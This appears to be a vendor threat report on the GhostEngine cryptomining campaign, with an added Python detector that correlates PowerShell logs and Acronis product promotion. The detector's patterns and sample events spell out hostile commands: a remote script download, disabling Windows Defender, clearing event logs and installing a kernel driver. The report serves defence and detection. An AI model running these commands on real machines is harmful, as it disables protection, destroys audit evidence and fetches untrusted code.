Authors:
Alexander Ivanyuk — Senior Director, Technology
Irina Artioli — Cyber Protection Evangelist
Candid Wüest — VP of Product Management
The Acronis Cyberthreats Update covers current cyberthreat activity and trends, as observed by Acronis analysts and sensors. Figures presented here were gathered in May of this year and reflect threats that we detected as well as news stories from the public domain. This report represents a global outlook and is based on more than one million unique endpoints distributed around the world.
Incidents of the month
A new cryptomining campaign, identified as 'REF4578,' has been discovered utilizing the 'GhostEngine' payload to disable endpoint detection and response (EDR) security software via vulnerable drivers. This sophisticated attack begins with the execution of a file named 'Tiworker.exe,' which subsequently downloads a PowerShell script designed to disable Windows Defender and erase system logs. GhostEngine leverages vulnerable drivers from software such as Avast and IObit to terminate EDR processes, thus allowing the XMRig cryptominer to run covertly.
The attack specifically targets the weak points in EDR systems by manipulating drivers that inherently have high system privileges. By terminating these critical processes, the attackers ensure their mining activities go undetected, leading to significant unauthorized resource consumption and potential financial losses.
To mitigate such threats, it is crucial to monitor for abnormal PowerShell activity with the help of technologies like Acronis Script Emulator, and to load drivers securely, for example through Early Launch Anti-Malware (ELAM), as Acronis Cyber Protect does. Keeping all software updated to the latest versions also helps protect against the driver vulnerabilities such attacks abuse.
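The chain described above (a PowerShell download cradle, tampering with Windows Defender, erasing event logs, and installing a driver that is then used to terminate EDR processes) leaves a recognizable footprint in PowerShell script block logging. The following is an added illustration written for this report, not Acronis detection content or code from the campaign: it correlates Event ID 4104 script-block events per host and raises a finding when at least two distinct stages of that chain occur within a 30-minute window. The sample events, host names and driver/service names are constructed placeholders, and the regular expressions are illustrative assumptions rather than a vetted rule set. Note that the detector keys on behaviour, not on the initial filename, since 'Tiworker.exe' is also the name of a legitimate Windows component and a name match alone would be noisy.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Stages of the chain described in the report. The patterns are assumptions
# made for this example; tune them against your own telemetry before use.
STAGE_PATTERNS = {
    "download_cradle": re.compile(
        r"(Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient|\biwr\s)", re.I),
    "defender_tamper": re.compile(
        r"(Set-MpPreference\s+[^\n]*-Disable\w+|Add-MpPreference\s+[^\n]*-Exclusion)", re.I),
    "log_clearing": re.compile(
        r"(wevtutil(\.exe)?\s+cl\b|Clear-EventLog\b)", re.I),
    "driver_service": re.compile(
        r"(\bsc(\.exe)?\s+create\b[^\n]*type=\s*kernel|New-Service\b[^\n]*\.sys)", re.I),
}
WINDOW = timedelta(minutes=30)   # how close the stages must be to correlate
MIN_STAGES = 2                   # a single stage is often legitimate admin work


def classify(script_block: str) -> set:
    """Return the set of stage names whose pattern matches one script block."""
    return {name for name, pat in STAGE_PATTERNS.items() if pat.search(script_block)}


def correlate(events):
    """Group script-block events per host and flag hosts where at least
    MIN_STAGES distinct stages appear within WINDOW of each other.

    Each event is a dict with 'time' (ISO 8601), 'host', 'event_id' and
    'script_block', i.e. the shape a SIEM would hand back for Event ID 4104.
    """
    by_host = defaultdict(list)
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        stages = classify(ev["script_block"])
        if stages:
            by_host[ev["host"]].append(
                (datetime.fromisoformat(ev["time"]), stages, ev["script_block"]))

    findings = []
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= WINDOW]
            stages = set().union(*(h[1] for h in in_window))
            if len(stages) >= MIN_STAGES:
                findings.append({
                    "host": host,
                    "first_seen": t0.isoformat(),
                    "stages": sorted(stages),
                    "evidence": [h[2] for h in in_window],
                })
                break  # one finding per host is enough to trigger triage
    return findings


# Constructed sample telemetry (not real log data). Host ws-17 shows the full
# chain; host ws-42 shows a lone exclusion change that should not fire.
SAMPLE_EVENTS = [
    {"time": "2024-05-20T10:02:11", "host": "ws-17", "event_id": 4104,
     "script_block": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"time": "2024-05-20T10:05:40", "host": "ws-17", "event_id": 4104,
     "script_block": "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"},
    {"time": "2024-05-20T10:05:52", "host": "ws-17", "event_id": 4104,
     "script_block": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"time": "2024-05-20T10:06:05", "host": "ws-17", "event_id": 4104,
     "script_block": "wevtutil cl Security; wevtutil cl System"},
    {"time": "2024-05-20T10:06:30", "host": "ws-17", "event_id": 4104,
     "script_block": "sc.exe create PLACEHOLDER_DRV type= kernel binPath= C:\\Windows\\Temp\\placeholder.sys"},
    {"time": "2024-05-20T11:30:00", "host": "ws-42", "event_id": 4104,
     "script_block": "Add-MpPreference -ExclusionPath 'C:\\Build'"},
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding["host"], finding["first_seen"], ", ".join(finding["stages"]))
```

Requiring two or more stages within a short window keeps a single legitimate `Set-MpPreference` or `wevtutil` call from paging an analyst, while the full chain on one host surfaces immediately; the evidence list carries the matching script blocks so the responder can see exactly what ran.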
May malware detections
In May, Acronis Cyber Protect blocked 1.1 million malware threats on endpoints — a 45% decrease from April.
The below tables show the percentage of Acronis clients that had at least one malware threat blocked at the endpoint (this number has been hovering around 12% for the last year), as well as the top three countries by normalized malware detections. The higher the percentage, the higher the risk of a workload in that country being attacked by malware.
Protection
The aforementioned threats can be detected and mitigated with solutions from Acronis.
Acronis Cyber Protect Cloud protects against both known and never-before-seen threats through a multilayered protection approach. This includes behavior-based detection, AI- and ML-trained detections and anti-ransomware heuristics, which can detect and block encryption attempts and roll back any tampered files automatically without any user interaction.
Additional advanced email security and URL filtering can help you protect against social engineering threats. And the Acronis #CyberFit score helps you quickly identify systems that need attention, while the integrated Patch Management makes updating your software to the latest versions simple.
Advanced Security + Extended Detection and Response (XDR) for Acronis Cyber Protect Cloud brings the visibility needed to understand attacks while simplifying the context for administrators and enabling efficient remediation of any threats.
Learn more about Acronis’ approach to cyber protection.